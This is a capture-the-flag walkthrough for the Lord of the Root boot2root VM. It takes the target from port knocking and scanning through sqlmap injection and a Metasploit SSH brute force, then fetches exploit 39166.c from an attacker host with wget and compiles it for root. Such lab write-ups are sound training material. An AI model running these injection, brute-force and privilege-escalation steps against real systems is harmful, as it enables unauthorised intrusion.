
Hack the Lord of the Root VM (CTF Challenge)

This is another Boot2Root challenge, prepared by KoocSec as a hacking exercise. He built it after being inspired by his OSCP exam, and it is themed on the novel-turned-film series The Lord of the Rings.
Walkthrough
First, find the target on the local network:
netdiscover

Our target is 192.168.1.5.
Now run an nmap scan to find the open ports and the services behind them. -p- scans all 65535 TCP ports and -A adds version detection, OS detection, the default scripts and a traceroute:
nmap -p- -A 192.168.1.5

Nmap shows only port 22 open, running SSH. Port 80 is closed, so there is no web server to open in a browser yet. Let's see what port 22 has to offer; in a Kali terminal type:
ssh 192.168.1.5
The SSH pre-login banner says "Knock Friend To Enter" and "Easy as 123", and then it prompts for a password we do not have yet. The banner is a hint at port knocking: a daemon on the target watches for connection attempts to a secret sequence of ports and opens another port once it has seen the sequence in the right order. Let's try it:
nmap -r -Pn -p 1,2,3 192.168.1.5
Here,
-r : scan the ports in the order given instead of randomising them (the order is what makes this a knock sequence)
-Pn : treat the host as online and skip host discovery
-p : scan only the specified ports
1,2,3 : the knock sequence (taken from the hint "easy as 1,2,3")
Now run the full nmap scan again. This time we should see more than one port:
nmap -p- -A 192.168.1.5

One more port is open compared with the previous scan: 1337, serving HTTP. This is what we were after, since port 80 is closed. Let's open the target IP on that port in the browser:
192.168.1.5:1337
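The knock-then-rescan step above can be scripted so that the newly exposed port is found automatically instead of by comparing two scans by eye. The following shell script is an added example, not part of the original walkthrough: it assumes nmap is installed, takes the target IP and the 1,2,3 sequence from the text, and the function names (knock, scan_to, open_ports_from_gnmap, newly_opened) are my own. The two greppable-format files it parses are constructed here, not captured from the VM.

```shell
#!/bin/sh
# Port knock and before/after port diff: added example, not from the original post.
# Assumes nmap is installed. The target IP and the 1,2,3 knock sequence
# come from the walkthrough.

TARGET=192.168.1.5

# Send the knock one port at a time so the order is guaranteed; the knock
# daemon only opens the hidden port if it sees the sequence in order.
# --max-retries 0 keeps each knock to a single SYN.
knock() {                   # knock HOST PORT [PORT...]
    host=$1; shift
    for port in "$@"; do
        nmap -Pn -r -p "$port" --max-retries 0 "$host" >/dev/null 2>&1
    done
}

# Full TCP scan saved in nmap's greppable format so two runs can be compared.
scan_to() {                 # scan_to HOST OUTFILE
    nmap -Pn -p- -oG "$2" "$1" >/dev/null
}

# Open ports recorded in an -oG file, one per line, sorted in C collation
# so comm(1) accepts the lists.
open_ports_from_gnmap() {   # open_ports_from_gnmap FILE.gnmap
    grep -o '[0-9]\{1,5\}/open/' "$1" | cut -d/ -f1 | LC_ALL=C sort -u
}

# Ports open in AFTER but not in BEFORE: the ones the knock exposed.
newly_opened() {            # newly_opened BEFORE.gnmap AFTER.gnmap
    b=$(mktemp); a=$(mktemp)
    open_ports_from_gnmap "$1" >"$b"
    open_ports_from_gnmap "$2" >"$a"
    LC_ALL=C comm -13 "$b" "$a"
    rm -f "$b" "$a"
}

# Constructed sample files in -oG format (not captured from the VM), so the
# parser and the diff can be checked without touching the network.
BEFORE=$(mktemp); AFTER=$(mktemp)
cat >"$BEFORE" <<'EOF'
# Nmap scan initiated (constructed sample)
Host: 192.168.1.5 ()  Status: Up
Host: 192.168.1.5 ()  Ports: 22/open/tcp//ssh///  Ignored State: closed (65534)
EOF
cat >"$AFTER" <<'EOF'
# Nmap scan initiated (constructed sample)
Host: 192.168.1.5 ()  Status: Up
Host: 192.168.1.5 ()  Ports: 22/open/tcp//ssh///, 1337/open/tcp//http///  Ignored State: closed (65533)
EOF

echo "newly opened after knock: $(newly_opened "$BEFORE" "$AFTER" | tr '\n' ' ')"

# Against the live lab target the same functions are used as:
#   scan_to "$TARGET" before.gnmap
#   knock "$TARGET" 1 2 3
#   scan_to "$TARGET" after.gnmap
#   newly_opened before.gnmap after.gnmap
```

Knocking one port per nmap invocation is deliberate: a single nmap run with -p 1,2,3 -r keeps the order but may send the probes so close together that some knock daemons miss the sequence, and with retries disabled each port receives exactly one SYN.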
It opens a page with a single image, and there was nothing of interest in the page source either. So I ran nikto against it:
nikto -h 192.168.1.5:1337

None of the directories in nikto's output were useful, so I tried robots.txt, which I check by default on every web target.

And BOOM! I was right: an image opens here. I checked its page source as well.

In the page source I found a Base64 string, which I decoded using HackBar.

The result is shown above, but there is a trick: the output is itself Base64 and has to be decoded again, and only the part from the L up to the trailing = is the encoded string; the text around it is decoy. Decode that substring the same way.
Decoding it gives a URL. Let's open it.
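The double decoding above can be automated: pull out the longest run of Base64 characters, decode it, and repeat until the result is no longer Base64. This shell script is an added example, not from the original post; the function names are mine, and the sample string it decodes is constructed here (the walkthrough's URL, encoded twice with a decoy sentence around the inner layer), not the string taken from the VM.

```shell
#!/bin/sh
# Nested Base64 peeler: added example, not from the original post.
# Each layer may be surrounded by decoy text, as on the CTF page, so we
# pull out the longest Base64-looking run, decode it, and repeat until
# the candidate no longer decodes to printable text.

# Print the longest run of Base64 characters (20+ long, optional padding)
# found on stdin, or nothing if there is none.
longest_b64_token() {
    grep -o '[A-Za-z0-9+/]\{20,\}=\{0,2\}' |
        awk '{ if (length($0) > length(best)) best = $0 } END { print best }'
}

# Decode one layer; exits non-zero if the token is not valid Base64.
decode_layer() {
    printf '%s' "$1" | base64 -d 2>/dev/null
}

# Peel layers until nothing decodable is left; print the final plaintext.
decode_nested() {
    current=$1
    layers=0
    while :; do
        token=$(printf '%s' "$current" | longest_b64_token)
        [ -n "$token" ] || break
        decoded=$(decode_layer "$token") || break
        # A run of letters that merely looks like Base64 decodes to binary
        # junk; stop rather than replace real text with it.
        printf '%s' "$decoded" | LC_ALL=C grep -q '[^[:print:]]' && break
        current=$decoded
        layers=$((layers + 1))
    done
    echo "peeled $layers layer(s)" >&2
    printf '%s\n' "$current"
}

# Constructed sample (not the string from the VM): the walkthrough's URL,
# Base64 encoded, wrapped in a decoy sentence, then encoded again.
TARGET_URL='http://192.168.1.5:1337/978345210/'
inner=$(printf '%s' "$TARGET_URL" | base64 | tr -d '\n')
SAMPLE=$(printf 'Nothing to see here: %s move along' "$inner" | base64 | tr -d '\n')

decode_nested "$SAMPLE"
```

The 20-character minimum keeps short alphanumeric words such as "Nothing" or a path segment like 978345210 from being mistaken for an encoded layer; lower it if the payload you are chasing is shorter.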

Now we are face to face with a login portal. I will try to log in with a random username and password, and while doing so capture the session cookie with BurpSuite.
With the cookie captured, we use it in the next step, sqlmap. I wanted to dump the database to get usernames and passwords, which is why I chose sqlmap. The command I used is:
sqlmap -u http://192.168.1.5:1337/978345210/index.php --forms --batch --crawl=10 --cookie=ibf29bpuc0864gmfobpdsg0pu0 --level=5 --risk=3 --dbs
--forms tests the fields of the login form, --crawl=10 follows links from the start page, --level=5 and --risk=3 enable every payload sqlmap has, and --dbs enumerates the databases once an injection is found. Give --cookie the full name=value string exactly as it appears in Burp's Cookie header, otherwise the session is not reused. Without --batch, sqlmap asks a few questions as it goes: answer the first two with no and the third with yes; with --batch, as above, it takes its default answers automatically.
It then starts dumping the database.

And finally it will show you the database of usernames and passwords.

Next, save the usernames and the passwords in two separate text files and use them for an SSH login brute force. Open Metasploit in a Kali terminal with msfconsole and type:
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.5
set user_file /root/Desktop/user
set pass_file /root/Desktop/pass
exploit
The module reports the working pair: smeagol:MyPreciousR00t. Now log in over SSH with that username, entering the password when prompted.
Once logged in, check which Ubuntu release the box is running:
lsb_release -a
It is Ubuntu 14.04, and there is a public local privilege escalation exploit for it. Since such exploits target a kernel version rather than a distribution release, also note the kernel release (uname -r) before choosing one. In the Kali terminal, search for a suitable exploit:
searchsploit ubuntu 14.04
The exploit we will use is 39166.c. It has to be copied to the target and compiled there, so serve it from a web server on the attacker machine (192.168.1.18 here) and, on the target, type:
wget http://192.168.1.18/39166.c
gcc 39166.c -o shell
The first command downloads the exploit and the second compiles it into a binary named shell. Next, make the binary executable (the execute bit is all it needs) and run it:
chmod +x shell
./shell
Running it drops you into a root shell. Confirm with:
whoami
Now let’s get into root folder and see what it has to offer :
cd /root
ls
Here we find a text file, Flag.txt, which was our ultimate goal. No more waiting; read it:
cat Flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast
